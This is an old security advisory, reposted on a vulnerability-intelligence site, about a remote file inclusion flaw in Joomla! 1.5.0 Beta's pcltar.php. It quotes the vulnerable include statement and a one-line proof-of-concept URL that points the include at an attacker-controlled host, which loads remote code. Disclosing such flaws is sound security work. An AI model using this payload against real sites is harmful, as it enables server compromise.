Lucene search

joomla150-rfi.txt

🗓️ 24 Apr 2007 00:00:00Reported by OmidType

packetstorm🔗 packetstormsecurity.com👁 31 Views

Joomla! 1.5.0 Beta has a remote file inclusion vulnerability in /libraries/pcl/pcltar.php. Use caution as it is not recommended for live or production sites

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Hi,  
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`  
or `production` sites."  
Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt  
have a good security approach. Anyway, there is a remote file inclusion  
in Joomla 1.5.0 Beta :  
  
File /libraries/pcl/pcltar.php, Line 74 :  
if (!defined("PCLERROR_LIB"))  
{  
include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);  
}  
  
POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?  
  
The original advisory (in Persian) is located at :  
http://www.hackers.ir/advisories/joomla.html  
  
  
- Omid  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

24 Apr 2007 00:00Current

7.4High risk

Vulners AI Score7.4